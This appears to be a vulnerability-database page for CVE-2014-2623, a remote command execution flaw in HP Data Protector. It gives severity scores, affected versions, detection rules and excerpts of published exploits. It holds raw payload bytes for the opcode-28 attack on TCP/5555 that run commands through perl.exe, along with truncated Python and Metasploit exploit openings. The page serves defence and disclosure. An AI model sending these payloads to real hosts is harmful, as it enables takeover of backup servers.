CVE-2014-2623
published 2014-07-18CVE-2014-2623: Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
PriorityP182critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
89.39%
99.8th percentile
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | data_protector | >= 7.0 < 7.03_108 | 7.03_108 |
| hp | data_protector | >= 8.0 < 8.15 | 8.15 |
| hp | data_protector | >= 9.0 < 9.06 | 9.06 |
| hp | storage_data_protector | — | — |
| hp | storage_data_protector | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900
bytes↗
00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000
bytes↗
\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00
- →Detect exploit attempts by monitoring for TCP connections to port 5555 (OmniInet service) containing the opcode 28 pattern followed by '\perl.exe' and '-esystem(' strings in the payload. ↗
- →Alert on TCP/5555 payloads containing the hex sequence '32 00 01 01 01 01 01 01 00 01 00 01 00 01 00 01 01 00 20 32 38 00 5c 70 65 72 6c 2e 65 78 65 00 20 2d 65 73 79 73 74 65 6d' which encodes the opcode-28/perl.exe/-esystem exploit pattern. ↗
- →Detect spawning of cmd.exe or rundll32.exe as a child process of the OmniInet service (omniinet.exe) on Windows, which indicates successful command execution via this vulnerability. ↗
- →Watch for outbound SMB connections from the Data Protector host to attacker-controlled servers immediately after inbound connections on TCP/5555, as the Metasploit module uses a fake SMB server to deliver the DLL payload via rundll32.exe. ↗
- ·CVE-2016-2004 exists because the patch for CVE-2014-2623 was incomplete; systems patched only for CVE-2014-2623 (versions before 7.03_108, 8.x before 8.15, 9.x before 9.06) remain exploitable. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-89x3-hvxc-fwcx: Unspecified vulnerability in HP Storage Data Protector 8
ghsa_unreviewed·2022-05-17
CVE-2014-2623 [HIGH] GHSA-89x3-hvxc-fwcx: Unspecified vulnerability in HP Storage Data Protector 8
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
GHSA
GHSA-jrq2-fq6q-8g5w: HPE Data Protector before 7
ghsa_unreviewed·2022-05-14·CVSS 10.0
CVE-2016-2004 [CRITICAL] CWE-306 GHSA-jrq2-fq6q-8g5w: HPE Data Protector before 7
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2623.
VulnCheck
HP Data Protector Remote Command Execution
vulncheck·2014·CVSS 10.0
CVE-2014-2623 [CRITICAL] HP Data Protector Remote Command Execution
HP Data Protector Remote Command Execution
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Affected: HP storage_data_protector
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.akamai.com/blog/security/operation-prowli-traffic-manipulation-cryptocurrency-mining
No detection rules found.
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB
HP Data Protector 8.10 - Remote Command Execution (Metasploit)
exploitdb·2015-03-06
CVE-2014-2623 HP Data Protector 8.10 - Remote Command Execution (Metasploit)
HP Data Protector 8.10 - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
commands can be execute by sending crafted requests with opcode 28 to the OmniInet
service listening on the TCP/5555 port. Since there is an strict length limitation on
the command, rundll32.exe is executed, and the payload is provided through a DLL by a
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
Windows 7 SP1.
},
'Author' => [
'Christian Ramirez', # PO
Exploit-DB
HP Data Protector 8.x - Remote Command Execution
exploitdb·2015-01-30·CVSS 10.0
CVE-2014-2623 [CRITICAL] HP Data Protector 8.x - Remote Command Execution
HP Data Protector 8.x - Remote Command Execution
---
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py "
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSE
Exploit-DB
HP Data Protector Manager 8.10 - Remote Command Execution
exploitdb·2014-07-14
CVE-2014-2623 HP Data Protector Manager 8.10 - Remote Command Execution
HP Data Protector Manager 8.10 - Remote Command Execution
---
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.10 Remote command execution.
# Date: July 11 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org
# Contacts: [email protected] and [email protected]
# Version: HP Data Protector manager 8.10 the last version
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages
# Thanks:To GOD for giving us wisdom
# Description:
# A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555.
import soc
Metasploit
HP Data Protector 8.10 Remote Command Execution
metasploit
HP Data Protector 8.10 Remote Command Execution
HP Data Protector 8.10 Remote Command Execution
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be executed by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is a strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1.
Nuclei
HP Data Protector - Arbitrary Command Execution
nuclei·CVSS 10.0
CVE-2016-2004 [CRITICAL] HP Data Protector - Arbitrary Command Execution
HP Data Protector - Arbitrary Command Execution
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
Template:
id: CVE-2016-2004
info:
name: HP Data Protector - Arbitrary Command Execution
author: pussycat0x
severity: critical
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrar
No writeups or analysis indexed.
http://packetstormsecurity.com/files/130658/HP-Data-Protector-8.10-Remote-Command-Execution.htmlhttp://www.exploit-db.com/exploits/34066/http://www.exploit-db.com/exploits/35961http://www.exploit-db.com/exploits/36304http://www.osvdb.org/109069http://www.securitytracker.com/id/1030583https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04373818http://packetstormsecurity.com/files/130658/HP-Data-Protector-8.10-Remote-Command-Execution.htmlhttp://www.exploit-db.com/exploits/34066/http://www.exploit-db.com/exploits/35961http://www.exploit-db.com/exploits/36304http://www.osvdb.org/109069http://www.securitytracker.com/id/1030583https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04373818
2014-07-18
Published
Exploited in the wild